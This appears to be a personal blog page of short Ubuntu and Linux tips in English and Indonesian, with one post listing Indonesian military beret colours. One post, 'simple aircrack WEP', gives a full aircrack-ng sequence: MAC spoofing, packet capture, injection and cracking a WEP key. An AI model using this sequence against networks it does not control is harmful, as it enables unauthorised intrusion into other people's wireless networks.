start pidgin minimized on ubuntu 11.04

The title says it all, cara memulai pidgin minimized

1. Install the extended preference plugin

sudo aptitude install pidgin-extprefs

2.In your Pidgin click on Tools > Plugins check the extended Preferences 0.7a > Configure Plugin > check Hide buddy list at startup and close.
3.In Plugins check the Buddy List Options > Configure Plugin > check Hide the buddy list when it is created then close.

warna baret

AD

  1. Baret Kostrad:Warna hijau dengan lambang Cakra Sapta Agni (Lambang Kostrad)
  2. Baret Kopassus:Warna merah dengan lambang Kopassus
  3. Baret Infanteri (Di bawah organik Pussenif atau Kodam):Warna hijau dengan lambang Pussenif
  4. Baret Kavaleri:Warna hitam dengan lambang Pussenkav
  5. Baret Artileri Pertahanan Udara:Warna cokelat dengan lambang Pussenarhanud
  6. Baret Artileri Medan:Warna cokelat dengan lambang Pussenarmed
  7. Baret Zeni:Warna abu-abu dengan lambang Ditziad
  8. Baret Perhubungan:Warna hijau dengan lambang Dithubad
  9. Baret Polisi Militer:Warna biru muda dengan lambang Pistol bersilang (berbeda dengan lambang Puspomad yang bergambar topeng gajah mada)
  10. Baret Pembekalan Angkutan:Warna biru tua dengan lambang Ditbekangad
  11. Baret Penerbang Angkatan Darat:Warna merah dengan lambang kuda bersayap

AL

  1. Baret Marinir: Warna nila/ungu
  2. Baret Kopaska: Warna merah
  3. Komando Armada Laut barat dan timur: Warna biru tua

AU

  1. Korps Pasukan Khas atau Korpaskhas: Warna jingga
  2. Pomau/Polisi Militer Angkatan Udara: Warna biru muda

Polisi

  1. Samapta dan bhayangkara warnanya coklat
  2. Propam: warnanya biru, mirip dengan interpol yah?
  3. Brimob: waranya biru tua atau biru cobalt
  4. Resintel: merah
  5. Polairud: ini jarang nih, warnanya abu-abu

sumber: wiki, kaskus, google

 

simple aircrack WEP

SETUP

airmon-ng airmon-ng stop (interface) ifconfig (interface) down macchanger --mac 00:11:22:33:44:55 (interface) airmon-ng start (interface) 

PICK NET & CAPTURE

airodump-ng (interface) airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

GET MORE PACKET

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

CRACK A LACKIN’

aircrack-ng -b (bssid) (file name-01.cap)</em>

cheers.

office 2007 on lucid

Baru saja menginstallkan ubuntu ke salah satu temen dan karena katanya ga bisa make open office, jadi diinstallin Office 2007 deh…here goes…Mohon maaf bukan tutorial, sekedar berbagi aja.

1. Download Wine (http://wine.budgetdedicated.com/archive/index.html), saya pakai versi 1.1.24, dan ga tau kenapa versi terbarunya malah ga bisa.

2. Jalankan installasi Office 2007, Run setup.exe via wine (right click-run with wine)
ps. no. 2, pertama saya coba jalankan setup via USB> tidak bisa, via directory windows lama yang masih ntfs > tidak bisa, kopikan filesnya ke desktop ubuntu > baru bisa. Lagi2 saya tidak tahu kenapa, silahkan trial and error aja.

3. Install dlls, fonts dan lain-lain yang dibutuhkan officenya.
3.a winetricks :

sudo wget www.kegel.com/wine/winetricks

3.a.1

chmod +x ./winetricks

3.b

cabextracts sudo apt-get install cabextract

3.c fonts, dlls :

./winetricks gdiplus riched20 riched30 msxml3 msxml4 msxml6 corefonts tahoma vb6run vcrun6 msi2

4. wincfg
terminal > wincfg > pilih tab libraries > pilih rpcrt4 > edit to native then built in

5. saya sih abis itu direstrat, ga tau klo ga direstart piye….

6. Voila Word 2k7 on lucid doing lorem ipsum

Berhubung saya juga cumin coba2, klo ada kendala boleh post, tapi ga janji bisa ya. good luck.

ps. sorry bingung mau kasih screnie apa, abis isinya terminal smua.

pps. originally posted on oprekpc.com/forum

cheers 🙂

fix ubuntu 11.04 wifi problem

no wifi on 11.04?

SHOW LIST

sudo rfkill list

RESULT

1: phy0: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
2: acer-wireless: Wireless LAN
    Soft blocked: yes
    Hard blocked: no

yes means softblocked. use this:

1.sudo rfkill unblock all sudo rfkill list all

OR

2.sudo rmmod -f acer-wmi sudo rfkill unblock all sudo rfkill list all

cheers 🙂

how to start networking ubuntu

Mess your connection? here’s how to start networking ubuntu from console

/etc/init.d/networking start
/etc/init.d/NetworkManager start
ifconfig
ifconfig wlan0 up
iwlist scan iwconfig wlan0 essid essid_name dhcp wlan0

cheers 🙂